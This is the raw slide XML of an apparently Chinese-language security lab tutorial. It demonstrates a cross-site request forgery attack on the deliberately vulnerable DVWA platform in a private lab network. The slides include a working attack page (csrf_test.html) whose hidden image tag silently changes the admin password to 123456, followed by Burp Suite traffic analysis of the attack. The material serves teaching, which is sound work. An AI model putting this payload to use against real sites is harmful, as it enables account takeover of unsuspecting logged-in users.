            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10800080" cy="273939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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上安装了DVWA平台。访问地址：http://192.168.1.2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28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/dvwa/。</a:t>
            </a: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表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="856800" y="2303780"/>
          <a:ext cx="10553700" cy="1285240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1003300"/>
                <a:gridCol w="3870325"/>
                <a:gridCol w="2212975"/>
                <a:gridCol w="3467100"/>
              </a:tblGrid>
              <a:tr h="3048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编号</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IP地址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用途</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服务器A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>（被</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>攻</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>击</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>站</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>点）</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7820">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192.168.1.228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服务器B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>（发起攻击站点）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720000" y="1325245"/>
            <a:ext cx="10972165" cy="533336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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、攻击准备</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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页面提供了修改管理员账户“admin”密码的功能。修改过程包括输入新密码和确认密码，随后点击</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C</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h</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ange</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300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮以完成操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="23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2322000" y="1962150"/>
            <a:ext cx="7560000" cy="3342482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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49375"/>
            <a:ext cx="11132820" cy="1273175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:sp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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、生成扫描报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在菜单中，点击报告，可以看到ZAP可以生成HTML、XML、Markdown、JSON等格式的扫描报告。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2755900" y="2599690"/>
            <a:ext cx="6002020" cy="4021455"/>
            <a:chOff x="109" y="6522"/>
            <a:chExt cx="7314" cy="4278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="109" y="6522"/>
              <a:ext cx="7315" cy="4278"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2268" y="6703"/>
              <a:ext cx="1482" cy="697"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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00" y="1325245"/>
            <a:ext cx="10972165" cy="45720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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看源代码，分析漏洞的利用方法</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4" name="图片 -2147482604"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608455" y="1809115"/>
            <a:ext cx="8588375" cy="4809490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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00" y="1325245"/>
            <a:ext cx="10951845" cy="50755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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看源代码，分析漏洞的利用方法</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mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①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$pass_new和$pass_conf是用户输入的两个密码。代码会检查这两个密码是否相同，如果两个密码相同，就执行修改密码操作；如果密码不相同，就提示密码不匹配。没有任何的防CSRF机制。</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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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00" y="1382395"/>
            <a:ext cx="10951845" cy="50755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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看源代码，分析漏洞的利用方法</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② 我们尝试将两个密码都输入为123456</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点击“Change”按钮，显示“password Changed.”</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这时，URL地址栏为：	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.201/dvwa/vulnerabilities/csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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很明显，这就是修改密码的链接。</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87600" y="4484370"/>
            <a:ext cx="9029700" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383905" y="1595755"/>
            <a:ext cx="2152650" cy="1476375"/>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00" y="1325245"/>
            <a:ext cx="10951845" cy="507555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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、编写攻击页面</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在服务器B上，编写页网csrf_test.html，代码为：</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457200" lvl="1" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;img src="http://192.168.1.201/dvwa/vulnerabilities/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>border="0" style="display: none;" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;h1&gt;This is a demo&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;h2&gt;The password is changed to 123456&lt;/h2&gt;</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将网页csrf_test.html放到</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Web</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B</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的网站根目录上。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、漏洞利用</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在客户机上，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打开新标签页</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访问</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http://192.168.1.228/</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csrf_</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test.html，这时管理员账户“admin”的密码被自动更改为“123456”</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漏洞利用成功。</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785745" y="2804795"/>
            <a:ext cx="6619875" cy="2562225"/>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、通过Burp Suite观察CSRF攻击</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（1）设置Burp Suite</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开启“Intercept is off”模式。</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（2）登录到DVWA</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在客户机上打开浏览器，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.201/dvwa/</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，输入用户名和密码来登录DVWA平台。</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（3）执行CSRF攻击</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在浏览器上打开一个新的标签页，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/csrf_test.html。</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（4）查看CSRF攻击的HTTP历史记录</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点击HTTP history按钮。</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、通过Burp Suite观察CSRF攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>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① 选择Host为192.168.1.228并且URL为/csrf_test.html的记录，双击这条记录，打开GET request to http://192.168.1.228/csrf_test.html页面。</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indent="0" algn="just" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="10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在Request标签页中，可以看到发起了一个请求，访问IP地址为192.168.1.228的服务器（Web服务器B），获取csrf_test.html页面的内容。</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1584000" y="3470593"/>
            <a:ext cx="9000000" cy="1810195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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、通过Burp Suite观察CSRF攻击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在Response标签页中，显示了从192.168.1.228的服务器（Web服务器B）返回csrf_test.html页面的内容。</a:t>
            </a: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随后，浏览器对这些内容进行解析，并自动发起一个请求。</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1584000" y="3050858"/>
            <a:ext cx="9000000" cy="2950837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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、通过Burp Suite观察CSRF攻击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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>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② 选择下一条记录</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点击Next按钮。</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在Request标签页中，可以看到自动发起的请求，是访问IP地址为192.168.1.201的服务器（Web服务器A），此请求的目的是修改管理员账户“admin”的密码，新密码设置为123456。</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algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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1584000" y="3856990"/>
            <a:ext cx="9000000" cy="2149675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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 name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1325245"/>
            <a:ext cx="10800000" cy="543306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、通过Burp Suite观察CSRF攻击</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50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在Response标签页中，显示了从192.168.1.201的服务器（Web服务器A）返回的信息，确认密码已成功修改（“Password Changed.”）。</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ct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="23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4" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="400050"/>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ow级别的CSRF漏洞利用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5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584000" y="2569528"/>
            <a:ext cx="9000000" cy="2349193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593525" y="4943475"/>
            <a:ext cx="8991600" cy="1714500"/>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72235"/>
            <a:ext cx="11294745" cy="162814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、设置拦截代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">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zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
